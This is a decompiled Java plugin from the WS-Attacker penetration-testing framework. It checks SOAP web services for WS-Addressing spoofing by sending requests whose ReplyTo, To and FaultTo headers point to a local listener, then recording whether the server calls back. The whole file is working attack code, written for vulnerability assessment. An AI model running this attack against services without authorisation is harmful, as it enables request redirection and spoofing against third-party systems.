/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.wsAddressingSpoofing;

import com.eviware.soapui.config.WsaVersionTypeConfig;
import com.eviware.soapui.impl.wsdl.WsdlRequest;
import com.eviware.soapui.impl.wsdl.WsdlSubmit;
import com.eviware.soapui.impl.wsdl.WsdlSubmitContext;
import com.eviware.soapui.impl.wsdl.support.soap.SoapVersion;
import com.eviware.soapui.impl.wsdl.support.wsa.WsaConfig;
import com.eviware.soapui.impl.wsdl.support.wsa.WsaContainer;
import com.eviware.soapui.impl.wsdl.support.wsa.WsaUtils;
import com.eviware.soapui.model.ModelItem;
import com.eviware.soapui.model.iface.Request;
import com.eviware.soapui.model.iface.Submit;
import com.eviware.soapui.model.iface.SubmitContext;
import com.eviware.soapui.model.propertyexpansion.DefaultPropertyExpansionContext;
import com.eviware.soapui.model.propertyexpansion.PropertyExpansionContext;
import com.eviware.soapui.support.xml.XmlUtils;
import javax.xml.soap.SOAPElement;
import javax.xml.soap.SOAPException;
import javax.xml.soap.SOAPMessage;
import wsattacker.main.composition.plugin.AbstractPlugin;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.composition.plugin.option.AbstractOptionInteger;
import wsattacker.main.composition.plugin.option.AbstractOptionVarchar;
import wsattacker.main.composition.testsuite.RequestResponsePair;
import wsattacker.main.plugin.PluginState;
import wsattacker.main.plugin.option.OptionLimitedInteger;
import wsattacker.main.plugin.option.OptionSimpleVarchar;
import wsattacker.plugin.wsAddressingSpoofing.option.OptionIpChooser;
import wsattacker.plugin.wsAddressingSpoofing.util.MicroHttpServer;
import wsattacker.util.SoapUtilities;

public class WsAddressingSpoofing
extends AbstractPlugin {
    private static final long serialVersionUID = 2L;
    private static final String NAME = "WS-Addressing Spoofing";
    private static final String DESCRIPTION = "<html><p>This attack plugin checks if the server is vulnerable to WS-Addressing Spoofing.</p><p>It will generate requests which try to invoke the server to send a message to your local server. This can be very dangerous.</p></html>";
    private static final String[] CATEGORY = new String[]{"Spoofing Attacks"};
    private static final String AUTHOR = "Christian Mainka";
    private static final String VERSION = "1.1 / 2013-06-26";
    private static final int MAXPOINTS = 3;
    private OptionIpChooser chooser;
    private AbstractOptionInteger port;
    private AbstractOptionInteger waitingPerRequest;
    private AbstractOptionVarchar localServerUrl;
    private transient MicroHttpServer server;
    private transient WsdlRequest attackRequest;
    private transient WsdlRequest originalRequest;
    private boolean wasSuccessfulReplyTo;
    private boolean wasSuccessfulTo;
    private boolean wasSuccessfulFaultTo;

    public void initializePlugin() {
        this.initData();
        this.port = new OptionLimitedInteger("Port", 10080, "Lokal server listens on this port", 1, 65536);
        this.waitingPerRequest = new OptionLimitedInteger("Waiting", 3000, "Maximum time to wait per request in ms (>=3000ms)", 3000, 3600000);
        this.localServerUrl = new OptionSimpleVarchar("Endpoint", "http://localhost:10080", "This is the URL for your local Server.");
        this.chooser = new OptionIpChooser("Your IP", "Detect Endpoint automaticly or choose it manually", this.localServerUrl, this.port);
        this.getPluginOptions().add((AbstractOption)this.chooser);
        this.getPluginOptions().add((AbstractOption)this.port);
        this.getPluginOptions().add((AbstractOption)this.localServerUrl);
        this.getPluginOptions().add((AbstractOption)this.waitingPerRequest);
        this.setState(PluginState.Ready);
        this.server = null;
    }

    public void initData() {
        this.setName(NAME);
        this.setDescription(DESCRIPTION);
        this.setCategory(CATEGORY);
        this.setAuthor(AUTHOR);
        this.setVersion(VERSION);
        this.setMaxPoints(3);
    }

    public AbstractOptionInteger getPort() {
        return this.port;
    }

    public AbstractOptionVarchar getLocalServerUrl() {
        return this.localServerUrl;
    }

    public AbstractOptionInteger getWaitingPerRequest() {
        return this.waitingPerRequest;
    }

    protected void attackImplementationHook(RequestResponsePair original) {
        this.originalRequest = original.getWsdlRequest();
        this.server = new MicroHttpServer(this.getPort().getValue());
        this.info("Starting MicroHttpServer on port " + this.getPort().getValue());
        this.server.start();
        try {
            Thread.sleep(1000L);
        }
        catch (InterruptedException e) {
            this.log().error((Object)e.getMessage());
        }
        try {
            this.server.getServer().getAddress();
        }
        catch (Exception e) {
            this.log().error((Object)"Could not start lokal server. Port already in use?");
            this.setState(PluginState.Failed);
            return;
        }
        if (!this.isRunning()) {
            return;
        }
        this.doReplyToAttack();
        if (!this.isRunning()) {
            return;
        }
        this.doToAttack();
        if (!this.isRunning()) {
            return;
        }
        this.doFaulToAttack();
        if (this.wasSuccessful()) {
            this.critical(String.format("(%d/%d) attack methods worked. The server is vulerable to WS-Addressing Spoofing.", this.getCurrentPoints(), this.getMaxPoints()));
        }
        this.server.stop();
    }

    public void clean() {
        this.setCurrentPoints(0);
        this.wasSuccessfulReplyTo = false;
        this.wasSuccessfulTo = false;
        this.wasSuccessfulFaultTo = false;
        this.removeAttackRequest();
        this.setState(PluginState.Ready);
    }

    protected void stopHook() {
        this.removeAttackRequest();
        try {
            this.server.stop();
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    public boolean wasSuccessful() {
        return this.getCurrentPoints() > 0;
    }

    public boolean wasSuccessfulReplyTo() {
        return this.wasSuccessfulReplyTo;
    }

    public boolean wasSuccessfulTo() {
        return this.wasSuccessfulTo;
    }

    public boolean wasSuccessfulFaultTo() {
        return this.wasSuccessfulFaultTo;
    }

    private void createAttackRequest(String newName) {
        this.attackRequest = this.originalRequest.getOperation().addNewRequest(newName);
        this.originalRequest.copyTo(this.attackRequest, true, true);
    }

    private void removeAttackRequest() {
        if (this.attackRequest != null) {
            this.attackRequest.getOperation().removeRequest(this.attackRequest);
            this.attackRequest = null;
        }
    }

    private boolean configureFaultAttack() {
        SOAPMessage sm;
        WsaConfig wsa = this.attackRequest.getWsaConfig();
        this.attackRequest.setWsaEnabled(true);
        String content = this.attackRequest.getRequestContent();
        try {
            sm = SoapUtilities.stringToSoap((String)content);
        }
        catch (SOAPException e) {
            this.log().error((Object)("Could not convert String to SAAJ Objects. " + e.getMessage()));
            return false;
        }
        try {
            sm.getSOAPBody().removeContents();
        }
        catch (SOAPException e) {
            this.log().error((Object)("Could not remove SOAP body childs." + e.getMessage()));
            return false;
        }
        try {
            content = SoapUtilities.soapToString((SOAPElement)sm.getSOAPPart().getEnvelope());
        }
        catch (SOAPException e) {
            this.log().error((Object)("Could not convert SAAJ Objects back to a String. " + e.getMessage()));
            return false;
        }
        this.attackRequest.setRequestContent(content);
        wsa.setFaultTo(this.getLocalServerUrl().getValue());
        wsa.setMessageID("### FaultTo Message ID ###");
        return true;
    }

    private boolean configureToAttack() {
        WsaConfig wsa = this.attackRequest.getWsaConfig();
        this.attackRequest.setWsaEnabled(true);
        wsa.setTo(this.getLocalServerUrl().getValue());
        wsa.setMessageID("### To Message ID ###");
        return true;
    }

    private boolean configureReplyToAttack() {
        WsaConfig wsa = this.attackRequest.getWsaConfig();
        this.attackRequest.setWsaEnabled(true);
        wsa.setReplyTo(this.getLocalServerUrl().getValue());
        wsa.setMessageID("### ReplyTo Message ID ###");
        return true;
    }

    private boolean doAttackRequest() {
        boolean success;
        int STEP = 100;
        this.server.resetIncomingRequest();
        try {
            SoapVersion soapVersion = this.attackRequest.getOperation().getInterface().getSoapVersion();
            String content = this.attackRequest.getRequestContent();
            WsaUtils wsaUtils = new WsaUtils(content, soapVersion, this.attackRequest.getOperation(), (PropertyExpansionContext)new DefaultPropertyExpansionContext((ModelItem)this.attackRequest));
            content = wsaUtils.addWSAddressingRequest((WsaContainer)this.attackRequest);
            this.attackRequest.setRequestContent(content);
        }
        catch (Exception e) {
            this.log().error((Object)("Could not add WS-Addressing Header. " + e.getMessage()));
            return false;
        }
        this.trace("Sending request with content (PrettyPrinted):\n" + XmlUtils.prettyPrintXml((String)this.attackRequest.getRequestContent()));
        WsdlSubmit submit = null;
        try {
            submit = this.attackRequest.submit((SubmitContext)new WsdlSubmitContext((ModelItem)this.attackRequest), true);
        }
        catch (Request.SubmitException e) {
            this.log().error((Object)("Could not submit request." + e.getMessage()));
            return false;
        }
        int wait = this.waitingPerRequest.getValue();
        for (success = false; wait > 0 && !success && this.isRunning(); wait -= 100, success |= this.server.hasIncomingRequest()) {
            try {
                Thread.sleep(100L);
                continue;
            }
            catch (InterruptedException e) {
                // empty catch block
            }
        }
        if (this.isAborting()) {
            this.info("User cancled attack.");
            return false;
        }
        submit.waitUntilFinished();
        if (success) {
            this.trace("Server received data (PrettyPrinted): \n" + XmlUtils.prettyPrintXml((String)this.server.getRequestBody()));
        } else if (submit.getStatus().equals((Object)Submit.Status.FINISHED)) {
            String response = submit.getResponse().getContentAsString();
            if (response == null) {
                this.info("Web-Server does not send anything to local server, neither replied to us directly. Is the endpoit reachable?");
            } else {
                this.info("Web-Server does not send anything to local server, but we directly received an reply.");
                this.trace("Reply content:\n" + response);
            }
        }
        return success;
    }

    private boolean doReplyToAttack() {
        this.info("Trying to attack using 'ReplyTo' method");
        this.createAttackRequest(this.getName() + " ReplyToAttack");
        this.configureReplyToAttack();
        boolean success = this.doAttackRequest();
        if (!success && this.toggleWsaVersion()) {
            success = this.doAttackRequest();
        }
        this.removeAttackRequest();
        if (success) {
            this.addOnePoint();
            this.wasSuccessfulReplyTo = true;
            this.important(String.format("%s attack works, got %d/%d Points", "ReplyTo", this.getCurrentPoints(), this.getMaxPoints()));
        } else {
            this.info("'ReplyTo' attack failed.");
        }
        return success;
    }

    private boolean doToAttack() {
        this.info("Trying to attack using 'To' method");
        this.createAttackRequest(this.getName() + " ToAttack");
        this.configureToAttack();
        boolean success = this.doAttackRequest();
        if (!success && this.toggleWsaVersion()) {
            success = this.doAttackRequest();
        }
        this.removeAttackRequest();
        if (success) {
            this.addOnePoint();
            this.wasSuccessfulTo = true;
            this.important(String.format("%s attack works, got %d/%d Points", "To", this.getCurrentPoints(), this.getMaxPoints()));
        } else {
            this.info("'To' attack failed.");
        }
        return success;
    }

    private boolean doFaulToAttack() {
        this.info("Trying to attack using 'FaultTo' method (request will have empty SOAP Body)");
        this.createAttackRequest(this.getName() + " FaultAttack");
        this.configureFaultAttack();
        boolean success = this.doAttackRequest();
        if (!success && this.toggleWsaVersion()) {
            success = this.doAttackRequest();
        }
        this.removeAttackRequest();
        if (success && this.isRunning()) {
            this.addOnePoint();
            this.wasSuccessfulFaultTo = true;
            this.important(String.format("%s attack works, got %d/%d Points", "FaultTo", this.getCurrentPoints(), this.getMaxPoints()));
        } else {
            this.info("'FaulTo' attack failed.");
        }
        return success;
    }

    private boolean toggleWsaVersion() {
        WsaConfig wsa = this.attackRequest.getWsaConfig();
        String currentVersion = wsa.getVersion();
        String newVersion = null;
        boolean ret = false;
        if (currentVersion.equals(WsaVersionTypeConfig.X_200508.toString())) {
            newVersion = WsaVersionTypeConfig.X_200408.toString();
            ret = true;
        } else if (currentVersion.equals(WsaVersionTypeConfig.X_200408.toString())) {
            newVersion = WsaVersionTypeConfig.X_200508.toString();
            ret = true;
        }
        if (ret) {
            this.info("Changing WSA Version from " + currentVersion + " to " + newVersion);
            wsa.setVersion(newVersion);
        }
        return ret;
    }
}

